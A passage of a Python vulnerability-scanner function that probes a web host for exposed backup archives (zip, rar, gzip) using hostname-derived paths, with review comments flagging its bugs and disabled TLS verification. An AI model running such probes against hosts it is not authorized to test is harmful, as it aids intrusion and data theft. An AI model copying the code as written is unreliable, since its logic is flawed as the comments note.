        RandomAgent: value sent as the User-Agent header.
        ProxyIp: optional proxy host; when not None it is used for HTTP.

    Returns:
        ``_t.info`` for an early SpecialPayload hit, otherwise the
        ``Medusas`` list, or None if the final loop raises.
    """
    scheme, url, port = UrlProcessing(Url)
    # Derive the port from the scheme when the URL did not carry one.
    # Note: `port` is computed but never used in the URLs built below.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    # resp/resp2 are bound at module level rather than as locals.
    global resp
    global resp2
    Medusas=[]
    Medusa = "{} 存在敏感文件压缩下载漏洞\r\n漏洞详情:\r\nPayload:".format(url)
    Medusas.append(str(Medusa))
    # Build host-name-derived candidates (the original comment says they go
    # to SpecialPayload, but the code appends them to `payloads`).
    colon_payload = ""
    unsigned_payload = ""
    point_payload = ""
    underline_payload = ""
    expansion_number_payload = ""
    url_str_list = url.split(".")
    for url_str in url_str_list:
        colon_payload = colon_payload + url_str + ":"
    for url_str in url_str_list:
        unsigned_payload = unsigned_payload + url_str
    for url_str in url_str_list:
        point_payload = point_payload + url_str + "."
    for url_str in url_str_list:
        underline_payload = underline_payload + url_str + "_"
    for url_str in url_str_list:
        expansion_number_payload = expansion_number_payload + url_str + "-"
    # NOTE(review): `payloads` is module-level and is appended to on EVERY
    # call, so it grows with each target scanned and earlier hosts' names are
    # re-probed against later targets.
    payloads.append(str("/"+colon_payload[:-1]))
    payloads.append(str("/"+unsigned_payload))
    payloads.append(str("/"+point_payload[:-1]))
    payloads.append(str("/"+underline_payload[:-1]))
    payloads.append(str("/"+expansion_number_payload[:-1]))
    for payload in payloads:
        for suffix in suffixs:
            try:
                payload_url = scheme+"://"+url+payload+suffix
                headers = {
                    'Accept-Encoding': 'gzip, deflate',
                    'Accept': '*/*',
                    'User-Agent': RandomAgent,
                }
                #s = requests.session()
                if ProxyIp!=None:
                    proxies = {
                        # "http": "http://" + str(ProxyIps) ,  # the proxy value must be prefixed with http:// or https://
                        "http": "http://" + str(ProxyIp)
                    }
                    # verify=False on every request: TLS certificate validation is off.
                    resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
                    resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
                elif ProxyIp==None:
                    resp = requests.head(payload_url,headers=headers, timeout=5, verify=False)
                    resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False)
                con = resp.text  # HEAD body; unused
                code = resp.status_code
                # The GET (resp2) downloads the whole file only to read its
                # Content-Type; a missing header raises KeyError, swallowed below.
                if code==200 and (resp2.headers["Content-Type"] == "application/zip" or resp2.headers["Content-Type"] == "application/x-rar-compressed" or resp2.headers["Content-Type"] == "application/x-gzip" or resp2.headers["Content-Type"] == "application/gzip") :
                    Medusa="{}\r\n".format(payload_url)
                    Medusas.append(str(Medusa))
            except Exception as e:
                pass  # any failure for this candidate is silently skipped
    for Special in SpecialPayload:
        try:
            payload_url = scheme + "://" + url + Special
            headers = {
                'Accept-Encoding': 'gzip, deflate',
                'Accept': '*/*',
                'User-Agent': RandomAgent,
            }
            # s = requests.session()
            if ProxyIp != None:
                proxies = {
                    # "http": "http://" + str(ProxyIps) ,  # the proxy value must be prefixed with http:// or https://
                    "http": "http://" + str(ProxyIp)
                }
                resp = requests.head(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
                resp2 = requests.get(payload_url, headers=headers, proxies=proxies, timeout=5, verify=False)
            elif ProxyIp == None:
                resp = requests.head(payload_url, headers=headers, timeout=5, verify=False)
                resp2 = requests.get(payload_url, headers=headers, timeout=5, verify=False)
            con = resp.text  # HEAD body; unused
            code = resp.status_code
            if code == 200 and resp2.headers["Content-Type"] == "text/plain":
                Medusa = "{}\r\n".format(payload_url)
                Medusas.append(str(Medusa))
                _t = VulnerabilityInfo(Medusa)
                web = ClassCongregation.VulnerabilityDetails(_t.info)
                web.High()  # severity levels: serious = critical, High = high, Intermediate = medium, Low = low
                # NOTE(review): returns on the first text/plain hit, so the
                # archive findings collected in `Medusas` above are discarded
                # and the remaining SpecialPayload entries are never probed.
                return (_t.info)
        except:
            # Bare except: also catches KeyboardInterrupt/SystemExit.
            logging.warning(Url)
            _ = VulnerabilityInfo('')
            logging.warning(_.info.get('parameter'))
    try:
        # The concatenated string is never used; the list itself is returned.
        for i in Medusas:
            Medusa=Medusa+i
        return Medusas
    except:
        pass